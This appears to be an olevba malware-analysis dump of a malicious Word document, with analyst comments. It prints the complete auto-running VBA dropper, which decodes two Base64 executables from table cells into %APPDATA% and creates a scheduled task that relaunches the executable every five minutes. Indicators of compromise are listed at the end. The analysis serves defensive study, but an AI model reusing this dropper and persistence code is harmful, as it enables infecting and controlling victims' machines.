- olevba 0.53.1 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- MHT:MASIHB-- d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
- ===============================================================================
- FILE: d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
- Type: MHTML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: None - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub Document_Open()
- Dim sAppData As String // declare variables
- sAppData = Environ("APPDATA") // get environment variable https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/environ-function
- sAppData = sAppData & "\WinwordUpdates.exe" // string concatenation
- Dim sAppData1 As String
- sAppData1 = Environ("APPDATA")
- sAppData1 = sAppData1 & "\wwlib.dll"
- Dim b As String
- Dim a As String
- Dim tableNew As Table // Table object type https://docs.microsoft.com/en-us/office/vba/api/word.table
- Set tableNew = ActiveDocument.Tables(1) // Get first table of the active document https://docs.microsoft.com/en-us/office/vba/api/word.table
- a = tableNew.Cell(1, 1).Range.Text // at (row, column)
- a = Left(a, Len(a) - 2) // slice [:len-2]: strips the two-character end-of-cell marker that Word appends to cell text
- b = Base64Decode(a) // invoke function
- Dim fso As Object // like Object in java (object-oriented) https://docs.microsoft.com/en-us/office/vba/language/concepts/getting-started/creating-object-variables
- Set fso = CreateObject("Scripting.FileSystemObject") // File system object https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/filesystemobject-object
- Dim oFile As Object
- Set oFile = fso.CreateTextFile(sAppData) // get handle to the stream https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/textstream-object
- oFile.Write b
- oFile.Close // drop WinwordUpdates.exe to %APPDATA%\WinwordUpdates.exe
- Dim c As String // similar
- Dim d As String
- c = tableNew.Cell(1, 2).Range.Text
- c = Left(c, Len(c) - 2)
- d = Base64Decode(c)
- Dim fso1 As Object
- Set fso1 = CreateObject("Scripting.FileSystemObject")
- Dim oFile1 As Object
- Set oFile1 = fso1.CreateTextFile(sAppData1)
- oFile1.Write d
- oFile1.Close // drop wwlib.dll to %APPDATA%\wwlib.dll (same folder as WinwordUpdates.exe; possibly for DLL side-loading, to be confirmed from the binaries)
- yiBhyERIualWRmBjcsIbCZLq // call function with no parameter; it registers the "WinwordUpdates" scheduled task defined below
- Set fso = Nothing // set to null https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/nothing-keyword
- Set oFile = Nothing
- Set fso1 = Nothing
- Set oFile1 = Nothing
- End Sub
- Function Base64Decode(ByVal base64String) As String // self-explanatory: Base64 decoder using the standard alphabet and "=" padding
- Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
- Dim dataLength, sOut, groupBegin
- base64String = Replace(base64String, vbCrLf, "")
- base64String = Replace(base64String, vbTab, "")
- base64String = Replace(base64String, " ", "")
- dataLength = Len(base64String)
- If dataLength Mod 4 <> 0 Then
- Err.Raise 1, "Base64Decode", "Bad Base64 string."
- Exit Function
- End If
- For groupBegin = 1 To dataLength Step 4
- Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
- numDataBytes = 3
- nGroup = 0
- For CharCounter = 0 To 3
- thisChar = Mid(base64String, groupBegin + CharCounter, 1)
- If thisChar = "=" Then
- numDataBytes = numDataBytes - 1
- thisData = 0
- Else
- thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
- End If
- If thisData = -1 Then
- Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
- Exit Function
- End If
- nGroup = 64 * nGroup + thisData
- Next
- nGroup = Hex(nGroup)
- nGroup = String(6 - Len(nGroup), "0") & nGroup
- pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
- Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
- Chr(CByte("&H" & Mid(nGroup, 5, 2)))
- sOut = sOut & Left(pOut, numDataBytes)
- Next
- Base64Decode = sOut
- End Function
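- Function yiBhyERIualWRmBjcsIbCZLq() // persistence: registers a scheduled task that runs %APPDATA%\WinwordUpdates.exe; adapted from the template code at https://docs.microsoft.com/en-us/windows/desktop/taskschd/daily-trigger-example--scripting-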
- Dim sAppData As String
- sAppData = Environ("APPDATA")
- sAppData = sAppData & "\WinwordUpdates.exe"
- Const TriggerTypeTime = 1
- Const ActionTypeExec = 0
- Set service = CreateObject("Schedule.Service") // Create the TaskService object
- Call service.Connect
- Dim rootFolder
- Set rootFolder = service.GetFolder("\")
- Dim taskDefinition
- Set taskDefinition = service.NewTask(0)
- Dim principal // security logon method that is required to run the tasks https://docs.microsoft.com/en-us/windows/desktop/taskschd/principal-logontype
- Set principal = taskDefinition.principal
- principal.LogonType = 3 // User must already be logged on. The task will be run only in an existing interactive session
- Dim settings // https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskschedulerschema-settings-tasktype-element
- Set settings = taskDefinition.settings
- settings.Enabled = True
- settings.StartWhenAvailable = True
- settings.Hidden = False
- Dim triggers // https://docs.microsoft.com/en-us/windows/desktop/taskschd/daily-trigger-example--scripting- ( see 4)
- Set triggers = taskDefinition.triggers // https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskdefinition-triggers
- Dim trigger
- Set trigger = triggers.Create(TriggerTypeTime)
- Dim startTime, endTime
- Dim time
- time = DateAdd("s", 30, Now)
- startTime = XmlTime(time)
- trigger.StartBoundary = startTime // task runs after 30s
- trigger.Enabled = True
- Dim Repetition
- Set Repetition = trigger.Repetition
- Repetition.Interval = "PT" & "5" & "M" // repeat every 5 minutes https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskschedulerschema-duration-repetitiontype-element
- Dim Action
- Set Action = taskDefinition.Actions.Create(ActionTypeExec)
- Action.Path = sAppData
- Action.Arguments = ""
- Call rootFolder.RegisterTaskDefinition("WinwordUpdates", taskDefinition, 6, , , 3)
- End Function
- Function XmlTime(t) // convert to xml format
- Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
- Dim tTime, tDate
- cSecond = "0" & Second(t)
- cMinute = "0" & Minute(t)
- CHour = "0" & Hour(t)
- cDay = "0" & Day(t)
- cMonth = "0" & Month(t)
- cYear = Year(t)
- tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
- ":" & Right(cSecond, 2)
- tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
- XmlTime = tDate & "T" & tTime
- End Function
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | AutoExec | Document_Open | Runs when the Word or Publisher |
- | | | document is opened |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings (use option --deobf to |
- | | | deobfuscate) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | CreateTextFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | WinwordUpdates.exe | Executable file name |
- | IOC | wwlib.dll | Executable file name |
- +------------+--------------------+-----------------------------------------+